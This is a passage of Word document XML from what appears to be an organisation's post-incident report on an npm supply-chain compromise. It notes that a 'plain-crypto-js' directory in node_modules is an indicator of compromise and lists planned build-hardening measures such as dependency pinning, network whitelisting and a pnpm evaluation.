          <w:rStyle w:val="SourceText"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>4.2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>replaces the original</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>package.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a clean pre-staged manifest during </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>the its</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> deployment process. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">simple presence </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">of the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>plain-crypto-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>node_modules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AT ALL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, regardless of reported version, is an indicator of compromise. Filesystem and network IOC checks are necessary for reliable detection and confirmation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFB38" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="6" w:color="ECF0F1"/>
        </w:pBdr>
        <w:spacing w:before="450" w:after="225"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
        <w:t>8. Preventive Measures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFB39" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="360" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif"/>
          <w:b w:val="0"/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>8.1 Short Term: Build Process Hardening</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450"/>
        <w:gridCol w:w="7199"/>
        <w:gridCol w:w="1711"/>
      </w:tblGrid>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFB3D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="45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3A" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7199"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3B" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Measure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711"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3C" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFB41" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="45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3E" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7199"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3F" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Retool Docker-based &amp; Windows offline build processes to enforce full transitive dependency version pinning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711"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40" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>In Progress</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFB45" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB42" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7199" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB43" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Remove Nexus </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>npm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> proxy cache repository entirely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB44" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>In Progress</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFB49" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB46" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7199" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB47" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Add network scanning, exact expected network traffic whitelist to build servers, firewall &amp; flag everything else.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB48" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>In Progress</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="278CFB4A" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="009764A3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="2D5A9E"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="278CFB4B" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif"/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>8.2 Medium Term: Package Manager Evaluation</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450"/>
        <w:gridCol w:w="7740"/>
        <w:gridCol w:w="1170"/>
      </w:tblGrid>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFB4F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="45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4C" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="774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4D" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Measure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="117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4E" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFB53" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="45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50" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="77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51" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Investigate feasibility of migrating our internal package manager from </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>npm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>pnpm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="117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52" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Planned</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="278CFB54" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="360" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>pnpm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">offers finer-grained dependency control and stricter isolation semantics that may be better suited to the scale and complexity of our </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>monorepo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> infrastructure compared to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">. It is possible that, if determined feasible and feature-complete for our needs, this may </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>supercede</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> multiple parts of Section 8.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFB55" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="360" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif"/>
          <w:b w:val="0"/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">8.3 Long Term: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif"/>
          <w:b w:val="0"/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif"/>
          <w:b w:val="0"/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Consolas;Courier New;monospace" w:hAnsi="Consolas;Courier New;monospace"/>
          <w:b w:val="0"/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>min-release-age/min-release-age-exclude</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif"/>
          <w:b w:val="0"/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adoption (Node.js 24)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFB56" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
